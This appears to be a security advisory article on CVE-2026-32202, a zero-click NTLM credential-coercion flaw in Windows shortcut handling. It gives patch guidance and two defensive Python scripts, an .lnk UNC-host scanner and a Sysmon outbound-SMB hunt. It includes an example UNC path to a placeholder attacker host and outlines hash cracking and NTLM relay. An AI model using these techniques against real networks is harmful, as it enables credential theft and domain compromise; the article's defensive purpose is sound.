Microsoft on April 27 quietly updated its advisory for CVE-2026-32202 to mark the bug “Exploitation Detected,” and CISA followed two days later by adding it to the Known Exploited Vulnerabilities catalog with a May 12 remediation deadline for federal civilian agencies. The flaw was already patched in the April 14 Patch Tuesday release, but Microsoft initially published it with a low exploitability rating and no active-exploitation flag — meaning most defenders deprioritized it. That assessment was wrong.

CVE-2026-32202 is a zero-click NTLM credential-coercion bug in Windows Shell. It was discovered by Akamai researcher Maor Dahan while he was auditing Microsoft’s February 2026 fix for CVE-2026-21510, an LNK-handling zero-day that APT28 (Fancy Bear) had been chaining with CVE-2026-21513 to bypass SmartScreen and execute code from weaponized shortcuts. Microsoft’s February patch closed the RCE and SmartScreen-bypass legs of the chain — but left a third path open: the LNK-to-NTLM coercion behavior the same code path still permitted.

How the Coercion Works

When Windows Explorer renders a folder, it parses every .lnk file in that folder to fetch icons and resolve targets. A maliciously crafted shortcut can embed a UNC path — \\attacker.example\share\icon.ico — pointing at an attacker-controlled SMB server. Windows Shell resolves the path without checking the network zone, which triggers an automatic SMB connection. The connection initiates an NTLM authentication handshake, and the victim’s machine transmits its Net-NTLMv2 hash to the attacker before the user has clicked anything.

The user does not need to double-click the shortcut. They do not need to open it. Simply navigating to a folder containing the LNK — including the Downloads folder after a drive-by download, an attached ZIP that auto-extracts, or a network share opened via a phishing link — is enough. From the attacker’s perspective, this is an offline-crackable hash plus a relay primitive. Captured Net-NTLMv2 hashes can be cracked offline with Hashcat against weak passwords, or relayed in real time to LDAP, MSSQL, ADCS, or SMB endpoints that don’t enforce signing — which, in most enterprise networks, is still a non-trivial subset.
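The zero-click trigger is a shortcut file whose metadata points at a remote host, so one defensive check is to scan folders where untrusted content lands (Downloads, extracted archives, shares opened from mail) for .lnk files that reference any UNC host before Explorer ever renders them. The scanner below is an added example written for this article; it is not Akamai's tool, Microsoft's code, or the Sigma rule the article mentions. It walks the public MS-SHLLINK layout (ShellLinkHeader, LinkTargetIDList, LinkInfo, StringData, ExtraData) and reports every path-bearing field that starts with \\host\, which covers the icon location the article describes as well as the target's network share, the relative path and the environment-variable blocks. The two sample shortcuts are constructed in memory so the scanner can run offline; attacker.example is the placeholder host the article uses, and the field names are this example's own.

```python
"""Scan Windows shortcut (.lnk) files for fields that name a remote UNC host.

Added example for this article, not vendor code. Parses the public MS-SHLLINK
layout; sample shortcuts below are constructed fixtures.
"""
import re
import struct
from pathlib import Path

HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields in on-disk order, keyed by the LinkFlags bit that enables them
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
# ExtraData blocks that carry a path: EnvironmentVariableDataBlock, IconEnvironmentDataBlock
ENV_BLOCKS = {0xA0000001: "env_target", 0xA0000007: "icon_env_target"}
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")  # \\host or \\host\...


def _string_data(buf, pos, flags):
    """Read the StringData entries whose LinkFlags bit is set; return (fields, next pos)."""
    fields, unicode = {}, bool(flags & IS_UNICODE)
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", buf, pos)  # CountCharacters, no terminator
        pos += 2
        size = count * 2 if unicode else count
        fields[name] = buf[pos:pos + size].decode("utf-16-le" if unicode else "cp1252", "replace")
        pos += size
    return fields, pos


def _net_name(link_info):
    """NetName from LinkInfo's CommonNetworkRelativeLink (UNC share of the target), or None."""
    (li_flags,) = struct.unpack_from("<I", link_info, 8)
    if not li_flags & 0x2:  # CommonNetworkRelativeLinkAndPathSuffix not present
        return None
    (cnrl_off,) = struct.unpack_from("<I", link_info, 20)
    cnrl = link_info[cnrl_off:]
    (net_off,) = struct.unpack_from("<I", cnrl, 8)
    return cnrl[net_off:cnrl.index(b"\x00", net_off)].decode("cp1252", "replace")


def _extra_data(buf, pos):
    """Walk ExtraData blocks until the TerminalBlock; pull TargetUnicode from env blocks."""
    fields = {}
    while pos + 8 <= len(buf):
        size, sig = struct.unpack_from("<II", buf, pos)
        if size < 4:  # TerminalBlock
            break
        if sig in ENV_BLOCKS and size >= 0x314:
            raw = buf[pos + 8 + 260:pos + 8 + 260 + 520]  # skip TargetAnsi, read TargetUnicode
            fields[ENV_BLOCKS[sig]] = raw.decode("utf-16-le", "replace").split("\x00", 1)[0]
        pos += size
    return fields


def parse_lnk(buf):
    """Return the path-bearing fields of a shell link as a dict."""
    if len(buf) < 0x4C or struct.unpack_from("<I", buf, 0)[0] != 0x4C:
        raise ValueError("not a shell link header")
    (flags,) = struct.unpack_from("<I", buf, 0x14)
    pos, fields = 0x4C, {}
    if flags & HAS_ID_LIST:
        pos += 2 + struct.unpack_from("<H", buf, pos)[0]  # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        (li_size,) = struct.unpack_from("<I", buf, pos)
        net = _net_name(buf[pos:pos + li_size])
        if net:
            fields["link_info_net_name"] = net
        pos += li_size
    strings, pos = _string_data(buf, pos, flags)
    fields.update(strings)
    fields.update(_extra_data(buf, pos))
    return fields


def remote_hosts(buf):
    """Map each field that points at a UNC host to that host name."""
    return {k: m.group(1) for k, v in parse_lnk(buf).items() if (m := UNC_RE.match(v))}


def scan_directory(root):
    """Report every .lnk under root (e.g. a Downloads folder) that references a remote host."""
    findings = {}
    for path in Path(root).rglob("*.lnk"):
        try:
            hosts = remote_hosts(path.read_bytes())
        except (ValueError, struct.error, IndexError):
            continue  # truncated or malformed shortcut; worth logging separately in practice
        if hosts:
            findings[str(path)] = hosts
    return findings


def constructed_sample(icon_location):
    """Constructed test fixture: a minimal Unicode shell link with only an icon location set."""
    clsid = bytes.fromhex("0114020000000000c000000000000046")  # ShellLink CLSID, little-endian
    header = struct.pack("<I16sIIqqqIIIHHII", 0x4C, clsid, 0x40 | IS_UNICODE,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    string_data = struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16-le")
    return header + string_data + struct.pack("<I", 0)  # TerminalBlock


if __name__ == "__main__":
    for sample in (r"\\attacker.example\share\icon.ico", r"C:\Windows\System32\shell32.dll"):
        print(sample, "->", remote_hosts(constructed_sample(sample)))
```

Run scan_directory over a user's Downloads folder from an endpoint-management job and alert on any finding; a shortcut that references a host outside the organization's namespace has no legitimate reason to be there. The parser is deliberately strict (header size check, bounded slices) and treats malformed files as a separate condition rather than silently passing them, since a truncated or oddly built shortcut in a Downloads folder is itself worth a look.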

Microsoft assigned the bug a CVSS of 4.3, reflecting the limited direct impact (information disclosure of an NTLM hash). That number is misleading. In practice, NTLM relay is the entry vector for privilege escalation across most Active Directory environments, and “zero-click on folder browse” is roughly the highest-impact delivery mechanism for a coercion primitive that exists.

Affected Versions

Practically every supported Windows release. Microsoft’s advisory lists Windows 10 (1607, 1809, 21H2, 22H2), Windows 11 (22H3, 23H2, 24H2, 25H2, 26H1), and Windows Server 2012 through Windows Server 2025. The fix is in the April 2026 cumulative update — KB5083769 for Windows 11 24H2/25H2, with parallel KBs for the other channels.

Why This One Is Worse Than the CVSS Suggests

Three things make CVE-2026-32202 a higher priority than the score implies:

The APT28 link. The original CVE-2026-21510 was an APT28 weapon. The same TTPs — LNK delivery via phishing or watering-hole — port directly to the new variant with a smaller payload (no executable, just a UNC). Threat actors who already have working LNK templates from the February campaign are well positioned to retool.

The detection blind spot. Microsoft’s incorrect exploitability metadata on April 14 means many enterprises will have rolled the April patch through their normal cycle without flagging the hosts that had not yet received it. Two weeks of exploitation against an unpatched fleet is a real window.

The relay surface. Every time a Windows host without SMB signing or LDAP channel binding sees an NTLM authentication, it is a candidate for relay. The April 2026 Microsoft data still shows a meaningful fraction of enterprise domain controllers without LDAP signing enforced.

What To Do This Weekend

Patch. KB5083769 (or the parallel cumulative for your channel) closes the bug. Verify deployment status across your fleet — Defender for Endpoint, SCCM, Intune, or whatever inventory you trust. The CISA KEV deadline for federal agencies is May 12; private-sector defenders should aim for the same window or sooner.

If patching is blocked on a subset of hosts (legacy apps, change windows, etc.), the compensating controls are well known: enforce SMB signing on clients and servers, block outbound TCP/445 and TCP/139 at the perimeter (and on host firewalls if your environment can tolerate it), enable LDAP channel binding and signing on all domain controllers, and enable Extended Protection for Authentication on IIS and Exchange. Disabling NTLM entirely is the long-term fix, but the short-term reality is that NTLM relay defenses — signing, channel binding, EPA — are what stop this primitive from chaining into domain compromise.

For threat hunters: look for outbound SMB connections to non-corporate IPs, particularly from user workstations that have no business reaching external file shares. Akamai’s writeup includes a Sigma rule and IOCs.
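The hunt described above can be run directly over network-connection telemetry. The following is an added example for this article, not Akamai's Sigma rule or any vendor's detection content. It takes Sysmon Event ID 3 (NetworkConnect) records in the JSON Lines form a log forwarder would emit, and flags connections that a workstation initiated to TCP/445 or TCP/139 on an address outside the organization's ranges. The corporate address ranges, the WS- host-naming convention and the six log records are all constructed assumptions; on Windows the SMB redirector runs in the kernel, so these connections are logged with Image set to System rather than explorer.exe, which the sample reflects.

```python
"""Hunt for outbound SMB connections to non-corporate addresses in Sysmon telemetry.

Added example for this article, not Akamai's rule. Input is constructed
Sysmon Event ID 3 records in JSON Lines form.
"""
import ipaddress
import json
from collections import Counter

SMB_PORTS = {445, 139}
# Assumed: address space the organization treats as internal (RFC 1918 plus a
# CGNAT range used for a VPN). SMB from a workstation to anything else is a lead.
CORPORATE_NETS = [ipaddress.ip_network(n) for n in
                  ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "100.64.0.0/10")]
WORKSTATION_PREFIX = "WS-"  # assumed host-naming convention; set to "" to include servers

# Constructed sample telemetry: one hunt lead per workstation 1042 and 0007,
# one internal SMB connection, one server, one HTTPS connection, one inbound.
CONSTRUCTED_EVENTS = """\
{"EventID": 3, "Computer": "WS-1042.corp.example", "Image": "System", "Initiated": "true", "Protocol": "tcp", "DestinationIp": "203.0.113.7", "DestinationPort": 445, "UtcTime": "2026-04-28 09:12:03.114"}
{"EventID": 3, "Computer": "WS-1042.corp.example", "Image": "System", "Initiated": "true", "Protocol": "tcp", "DestinationIp": "10.20.5.12", "DestinationPort": 445, "UtcTime": "2026-04-28 09:12:04.002"}
{"EventID": 3, "Computer": "FS-01.corp.example", "Image": "System", "Initiated": "true", "Protocol": "tcp", "DestinationIp": "198.51.100.9", "DestinationPort": 445, "UtcTime": "2026-04-28 09:13:11.550"}
{"EventID": 3, "Computer": "WS-0007.corp.example", "Image": "System", "Initiated": "true", "Protocol": "tcp", "DestinationIp": "203.0.113.7", "DestinationPort": 139, "UtcTime": "2026-04-28 09:14:20.001"}
{"EventID": 3, "Computer": "WS-0007.corp.example", "Image": "C:\\\\Program Files\\\\Browser\\\\browser.exe", "Initiated": "true", "Protocol": "tcp", "DestinationIp": "203.0.113.7", "DestinationPort": 443, "UtcTime": "2026-04-28 09:14:21.300"}
{"EventID": 3, "Computer": "WS-0311.corp.example", "Image": "System", "Initiated": "false", "Protocol": "tcp", "DestinationIp": "203.0.113.7", "DestinationPort": 445, "UtcTime": "2026-04-28 09:15:00.000"}
"""


def is_corporate(ip):
    """True if the address falls inside one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CORPORATE_NETS)


def suspicious_smb_events(lines):
    """Yield Event 3 records where a workstation initiated SMB to a non-corporate address."""
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 3 or ev.get("Initiated") != "true":
            continue  # only outbound connections this host opened
        if int(ev["DestinationPort"]) not in SMB_PORTS:
            continue
        if not ev["Computer"].upper().startswith(WORKSTATION_PREFIX):
            continue  # servers are gated out by the assumed naming convention
        if is_corporate(ev["DestinationIp"]):
            continue
        yield ev


def hunt(lines):
    """Return (hits, destinations): the matching records and a count per external address."""
    hits = list(suspicious_smb_events(lines))
    return hits, Counter(h["DestinationIp"] for h in hits)


if __name__ == "__main__":
    hits, destinations = hunt(CONSTRUCTED_EVENTS)
    for h in hits:
        print(f'{h["UtcTime"]} {h["Computer"]} -> {h["DestinationIp"]}:{h["DestinationPort"]}')
    print("external SMB destinations:", dict(destinations))
```

Several workstations reaching the same external address on 445 within minutes, as in the constructed sample, is the pattern to escalate: it is what a folder of delivered shortcuts looks like from the network side. The destination counter gives the pivot for checking the perimeter firewall and for confirming whether TCP/445 egress is actually blocked, which is one of the compensating controls listed above.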
